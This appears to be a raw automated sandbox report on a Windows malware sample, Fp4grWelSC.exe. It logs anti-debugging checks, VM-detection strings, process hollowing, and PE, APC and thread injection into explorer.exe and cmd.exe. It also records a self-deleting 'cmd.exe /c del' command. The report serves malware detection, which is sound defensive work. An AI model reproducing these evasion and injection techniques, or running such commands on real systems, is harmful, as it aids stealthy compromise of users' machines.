          Source: explorer.exe, 00000016.00000000.897232542.00000000101EE000.00000004.00000001.sdmpBinary or memory string: \?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.713334907.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000016.00000000.897232542.00000000101EE000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}N
          Source: explorer.exe, 00000016.00000003.892662524.0000000004691000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00\
          Source: explorer.exe, 00000016.00000000.897232542.00000000101EE000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}O
          Source: explorer.exe, 00000005.00000000.733411384.000000000A897000.00000004.00000001.sdmpBinary or memory string: -98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
          Source: explorer.exe, 00000016.00000003.871888644.00000000046E4000.00000004.00000001.sdmpBinary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}*
          Source: explorer.exe, 00000016.00000003.849361987.0000000005DD1000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}p mode should ".
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F2258 IsDebuggerPresent,11_2_011F2258
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F1914 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,11_2_011F1914
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_004088D0 rdtsc 4_2_004088D0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011FB5E0 mov eax, dword ptr fs:[00000030h]11_2_011FB5E0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00409B40 LdrLoadDll,4_2_00409B40
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E7310 SetUnhandledExceptionFilter,11_2_011E7310
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_011E6FE3

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 11D0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeMemory written: C:\Users\user\Desktop\Fp4grWelSC.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess created: C:\Users\user\Desktop\Fp4grWelSC.exe C:\Users\user\Desktop\Fp4grWelSC.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Fp4grWelSC.exe"Jump to behavior
          Source: cmd.exe, 0000000B.00000002.943871101.0000000005650000.00000002.00020000.sdmpBinary or memory string: ,Program Manager
          Source: explorer.exe, 00000005.00000000.689548648.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.709918766.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.724562670.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.689743378.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710216019.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.724853374.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.699520641.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.689743378.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710216019.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.724853374.0000000001080000.00000002.00020000.sdmp, cmd.exe, 0000000B.00000002.943871101.0000000005650000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.874340943.0000000004E40000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.689743378.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710216019.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.724853374.0000000001080000.00000002.00020000.sdmp, cmd.exe, 0000000B.00000002.943871101.0000000005650000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.874340943.0000000004E40000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.841376064.0000000004A69000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.842632526.0000000004A69000.00000004.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000016.00000000.853795792.0000000000B28000.00000004.00000020.sdmpBinary or memory string: ProgmansT
          Source: explorer.exe, 00000016.00000003.841476449.0000000004A2F000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.873737852.0000000004A35000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd(%
          Source: explorer.exe, 00000005.00000000.689743378.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.710216019.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.724853374.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.702175441.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.732418919.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.716929271.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Users\user\Desktop\Fp4grWelSC.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
